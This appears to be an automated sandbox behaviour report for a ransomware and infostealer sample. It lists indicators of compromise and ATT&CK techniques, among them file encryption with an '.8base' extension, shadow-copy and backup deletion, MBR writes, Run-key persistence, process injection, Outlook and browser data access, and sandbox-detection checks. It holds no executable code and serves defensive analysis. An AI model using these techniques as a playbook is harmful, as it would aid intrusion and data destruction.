ammyyadmin | ff38415bfa7f2db5ba40f26e64ede0676971c441823d2ec2755d644d8905d809

pid	Process
2080	bcdedit.exe
4272	bcdedit.exe

Renames multiple (373) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

pid	Process
464	wbadmin.exe

Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
3580	netsh.exe
2752	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	svchost.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\139E.exe	139E.exe

Executes dropped EXE 21 IoCs

pid	Process
2456	V]5jPPdpdb.exe
4368	m_Rb%.exe
4852	V]5jPPdpdb.exe
4596	V]5jPPdpdb.exe
1736	V]5jPPdpdb.exe
3160	V]5jPPdpdb.exe
4136	V]5jPPdpdb.exe
1764	V]5jPPdpdb.exe
2200	V]5jPPdpdb.exe
4108	V]5jPPdpdb.exe
2112	V]5jPPdpdb.exe
2444	V]5jPPdpdb.exe
264	m_Rb%.exe
1156	m_Rb%.exe
3060	139E.exe
4700	1544.exe
4436	139E.exe
2736	139E.exe
1064	139E.exe
3240	1544.exe
4356	svchost.exe

Loads dropped DLL 1 IoCs

pid	Process
2976	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	certreq.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\139E = "C:\\Users\\Admin\\AppData\\Local\\139E.exe"	139E.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\139E = "C:\\Users\\Admin\\AppData\\Local\\139E.exe"	139E.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1141987721-3945596982-3297311814-1000\desktop.ini	139E.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1141987721-3945596982-3297311814-1000\desktop.ini	139E.exe
File opened for modification	C:\Program Files\desktop.ini	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	139E.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3364 set thread context of 4904	3364	b5b467e9309cbddb4a9ed34a82a36163.exe	84
PID 4368 set thread context of 1156	4368	m_Rb%.exe	99
PID 3060 set thread context of 4436	3060	139E.exe	112
PID 2736 set thread context of 1064	2736	139E.exe	115
PID 4700 set thread context of 3240	4700	1544.exe	116

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libparam_eq_plugin.dll	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookLargeTile.scale-200.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-20_altform-unplated_contrast-black.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-40_altform-unplated.png	139E.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar	139E.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-environment-l1-1-0.dll.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteSmallTile.scale-200.png	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\SATIN.INF	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-ms	139E.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Trial-pl.xrm-ms.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.Authorization.dll.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	139E.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\mmsogdiplusim.dll	139E.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_zh_HK.properties	139E.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-pl.xrm-ms.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File created	C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipskor.xml	139E.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-48.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubStoreLogo.scale-100_contrast-white.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-200_contrast-white.png	139E.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-default_32.svg.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File created	C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgePackages.h.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\ScreenSketchStoreLogo.scale-125_contrast-black.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-24.png	139E.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-default_32.svg	139E.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIF.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MeetingJoinAxOC.dll	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionGroupWideTile.scale-100.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionMedTile.scale-100.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeBadge.scale-150.png	139E.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\bin\mlib_image.dll.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-150_contrast-white.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailSmallTile.scale-100.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.UI\Resources\Images\star_full.png	139E.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-ul-oob.xrm-ms	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\TITLE.XSL	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\dcfmui.msi.16.en-us.vreg.dat	139E.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\kn-IN\View3d\3DViewerProductDescription-universal.xml	139E.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailWideTile.scale-125.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-32_altform-lightunplated.png	139E.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Office.Interop.Outlook.dll	139E.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i420_plugin.dll	139E.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\SmallTile.scale-125.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxSmallTile.scale-150.png	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ul.xrm-ms	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x86__8wekyb3d8bbwe\Microsoft.Services.Store.Engagement.dll	139E.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-32.png	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-20_altform-unplated_contrast-white.png	139E.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\Mozilla Firefox\updater.ini	139E.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxMediumTile.scale-100.png	139E.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-focus.svg.id[805E56EE-3483].[support@rexsdata.pro].8base	139E.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_OEM_Perp-ppd.xrm-ms	139E.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionGroupMedTile.scale-400.png	139E.exe

Checks SCSI registry key(s) 3 TTPs 7 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	m_Rb%.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	m_Rb%.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	m_Rb%.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	certreq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	certreq.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

pid	Process
4160	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4904	b5b467e9309cbddb4a9ed34a82a36163.exe
4904	b5b467e9309cbddb4a9ed34a82a36163.exe
4904	b5b467e9309cbddb4a9ed34a82a36163.exe
4904	b5b467e9309cbddb4a9ed34a82a36163.exe
4760	certreq.exe
4760	certreq.exe
4760	certreq.exe
4760	certreq.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
2456	V]5jPPdpdb.exe
4368	m_Rb%.exe
4368	m_Rb%.exe
1156	m_Rb%.exe
1156	m_Rb%.exe
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3128	Explorer.EXE

Suspicious behavior: MapViewOfSection 33 IoCs

pid	Process
1156	m_Rb%.exe
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3128	Explorer.EXE
3148	explorer.exe
3148	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3364	b5b467e9309cbddb4a9ed34a82a36163.exe
Token: SeDebugPrivilege	2456	V]5jPPdpdb.exe
Token: SeDebugPrivilege	4368	m_Rb%.exe
Token: SeDebugPrivilege	3060	139E.exe
Token: SeDebugPrivilege	4700	1544.exe
Token: SeDebugPrivilege	2736	139E.exe
Token: SeDebugPrivilege	4436	139E.exe
Token: SeBackupPrivilege	5096	vssvc.exe
Token: SeRestorePrivilege	5096	vssvc.exe
Token: SeAuditPrivilege	5096	vssvc.exe
Token: SeShutdownPrivilege	3128	Explorer.EXE
Token: SeCreatePagefilePrivilege	3128	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3420	WMIC.exe
Token: SeSecurityPrivilege	3420	WMIC.exe
Token: SeTakeOwnershipPrivilege	3420	WMIC.exe
Token: SeLoadDriverPrivilege	3420	WMIC.exe
Token: SeSystemProfilePrivilege	3420	WMIC.exe
Token: SeSystemtimePrivilege	3420	WMIC.exe
Token: SeProfSingleProcessPrivilege	3420	WMIC.exe
Token: SeIncBasePriorityPrivilege	3420	WMIC.exe
Token: SeCreatePagefilePrivilege	3420	WMIC.exe
Token: SeBackupPrivilege	3420	WMIC.exe
Token: SeRestorePrivilege	3420	WMIC.exe
Token: SeShutdownPrivilege	3420	WMIC.exe
Token: SeDebugPrivilege	3420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3420	WMIC.exe
Token: SeRemoteShutdownPrivilege	3420	WMIC.exe
Token: SeUndockPrivilege	3420	WMIC.exe
Token: SeManageVolumePrivilege	3420	WMIC.exe
Token: 33	3420	WMIC.exe
Token: 34	3420	WMIC.exe
Token: 35	3420	WMIC.exe
Token: 36	3420	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3420	WMIC.exe
Token: SeSecurityPrivilege	3420	WMIC.exe
Token: SeTakeOwnershipPrivilege	3420	WMIC.exe
Token: SeLoadDriverPrivilege	3420	WMIC.exe
Token: SeSystemProfilePrivilege	3420	WMIC.exe
Token: SeSystemtimePrivilege	3420	WMIC.exe
Token: SeProfSingleProcessPrivilege	3420	WMIC.exe
Token: SeIncBasePriorityPrivilege	3420	WMIC.exe
Token: SeCreatePagefilePrivilege	3420	WMIC.exe
Token: SeBackupPrivilege	3420	WMIC.exe
Token: SeRestorePrivilege	3420	WMIC.exe
Token: SeShutdownPrivilege	3420	WMIC.exe
Token: SeDebugPrivilege	3420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3420	WMIC.exe
Token: SeRemoteShutdownPrivilege	3420	WMIC.exe
Token: SeUndockPrivilege	3420	WMIC.exe
Token: SeManageVolumePrivilege	3420	WMIC.exe
Token: 33	3420	WMIC.exe
Token: 34	3420	WMIC.exe
Token: 35	3420	WMIC.exe
Token: 36	3420	WMIC.exe
Token: SeBackupPrivilege	116	wbengine.exe
Token: SeRestorePrivilege	116	wbengine.exe
Token: SeSecurityPrivilege	116	wbengine.exe
Token: SeShutdownPrivilege	3128	Explorer.EXE
Token: SeCreatePagefilePrivilege	3128	Explorer.EXE
Token: SeShutdownPrivilege	3128	Explorer.EXE
Token: SeCreatePagefilePrivilege	3128	Explorer.EXE
Token: SeShutdownPrivilege	3128	Explorer.EXE
Token: SeCreatePagefilePrivilege	3128	Explorer.EXE
Token: SeShutdownPrivilege	3128	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4356	svchost.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3128	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3364 wrote to memory of 4904	3364	b5b467e9309cbddb4a9ed34a82a36163.exe	84
PID 3364 wrote to memory of 4904	3364	b5b467e9309cbddb4a9ed34a82a36163.exe	84
PID 3364 wrote to memory of 4904	3364	b5b467e9309cbddb4a9ed34a82a36163.exe	84
PID 3364 wrote to memory of 4904	3364	b5b467e9309cbddb4a9ed34a82a36163.exe	84
PID 3364 wrote to memory of 4904	3364	b5b467e9309cbddb4a9ed34a82a36163.exe	84
PID 3364 wrote to memory of 4904	3364	b5b467e9309cbddb4a9ed34a82a36163.exe	84
PID 3364 wrote to memory of 4904	3364	b5b467e9309cbddb4a9ed34a82a36163.exe	84
PID 3364 wrote to memory of 4904	3364	b5b467e9309cbddb4a9ed34a82a36163.exe	84
PID 4904 wrote to memory of 4760	4904	b5b467e9309cbddb4a9ed34a82a36163.exe	90
PID 4904 wrote to memory of 4760	4904	b5b467e9309cbddb4a9ed34a82a36163.exe	90
PID 4904 wrote to memory of 4760	4904	b5b467e9309cbddb4a9ed34a82a36163.exe	90
PID 4904 wrote to memory of 4760	4904	b5b467e9309cbddb4a9ed34a82a36163.exe	90
PID 2456 wrote to memory of 4852	2456	V]5jPPdpdb.exe	98
PID 2456 wrote to memory of 4852	2456	V]5jPPdpdb.exe	98
PID 2456 wrote to memory of 4852	2456	V]5jPPdpdb.exe	98
PID 2456 wrote to memory of 4596	2456	V]5jPPdpdb.exe	109
PID 2456 wrote to memory of 4596	2456	V]5jPPdpdb.exe	109
PID 2456 wrote to memory of 4596	2456	V]5jPPdpdb.exe	109
PID 2456 wrote to memory of 1736	2456	V]5jPPdpdb.exe	108
PID 2456 wrote to memory of 1736	2456	V]5jPPdpdb.exe	108
PID 2456 wrote to memory of 1736	2456	V]5jPPdpdb.exe	108
PID 2456 wrote to memory of 3160	2456	V]5jPPdpdb.exe	107
PID 2456 wrote to memory of 3160	2456	V]5jPPdpdb.exe	107
PID 2456 wrote to memory of 3160	2456	V]5jPPdpdb.exe	107
PID 2456 wrote to memory of 4136	2456	V]5jPPdpdb.exe	106
PID 2456 wrote to memory of 4136	2456	V]5jPPdpdb.exe	106
PID 2456 wrote to memory of 4136	2456	V]5jPPdpdb.exe	106
PID 2456 wrote to memory of 1764	2456	V]5jPPdpdb.exe	105
PID 2456 wrote to memory of 1764	2456	V]5jPPdpdb.exe	105
PID 2456 wrote to memory of 1764	2456	V]5jPPdpdb.exe	105
PID 2456 wrote to memory of 2200	2456	V]5jPPdpdb.exe	104
PID 2456 wrote to memory of 2200	2456	V]5jPPdpdb.exe	104
PID 2456 wrote to memory of 2200	2456	V]5jPPdpdb.exe	104
PID 2456 wrote to memory of 4108	2456	V]5jPPdpdb.exe	103
PID 2456 wrote to memory of 4108	2456	V]5jPPdpdb.exe	103
PID 2456 wrote to memory of 4108	2456	V]5jPPdpdb.exe	103
PID 2456 wrote to memory of 2112	2456	V]5jPPdpdb.exe	102
PID 2456 wrote to memory of 2112	2456	V]5jPPdpdb.exe	102
PID 2456 wrote to memory of 2112	2456	V]5jPPdpdb.exe	102
PID 2456 wrote to memory of 2444	2456	V]5jPPdpdb.exe	101
PID 2456 wrote to memory of 2444	2456	V]5jPPdpdb.exe	101
PID 2456 wrote to memory of 2444	2456	V]5jPPdpdb.exe	101
PID 4368 wrote to memory of 264	4368	m_Rb%.exe	100
PID 4368 wrote to memory of 264	4368	m_Rb%.exe	100
PID 4368 wrote to memory of 264	4368	m_Rb%.exe	100
PID 4368 wrote to memory of 1156	4368	m_Rb%.exe	99
PID 4368 wrote to memory of 1156	4368	m_Rb%.exe	99
PID 4368 wrote to memory of 1156	4368	m_Rb%.exe	99
PID 4368 wrote to memory of 1156	4368	m_Rb%.exe	99
PID 4368 wrote to memory of 1156	4368	m_Rb%.exe	99
PID 4368 wrote to memory of 1156	4368	m_Rb%.exe	99
PID 3128 wrote to memory of 3060	3128	Explorer.EXE	110
PID 3128 wrote to memory of 3060	3128	Explorer.EXE	110
PID 3128 wrote to memory of 3060	3128	Explorer.EXE	110
PID 3128 wrote to memory of 4700	3128	Explorer.EXE	111
PID 3128 wrote to memory of 4700	3128	Explorer.EXE	111
PID 3128 wrote to memory of 4700	3128	Explorer.EXE	111
PID 3060 wrote to memory of 4436	3060	139E.exe	112
PID 3060 wrote to memory of 4436	3060	139E.exe	112
PID 3060 wrote to memory of 4436	3060	139E.exe	112
PID 3060 wrote to memory of 4436	3060	139E.exe	112
PID 3060 wrote to memory of 4436	3060	139E.exe	112
PID 3060 wrote to memory of 4436	3060	139E.exe	112
PID 3060 wrote to memory of 4436	3060	139E.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Users\Admin\AppData\Local\Temp\b5b467e9309cbddb4a9ed34a82a36163.exe
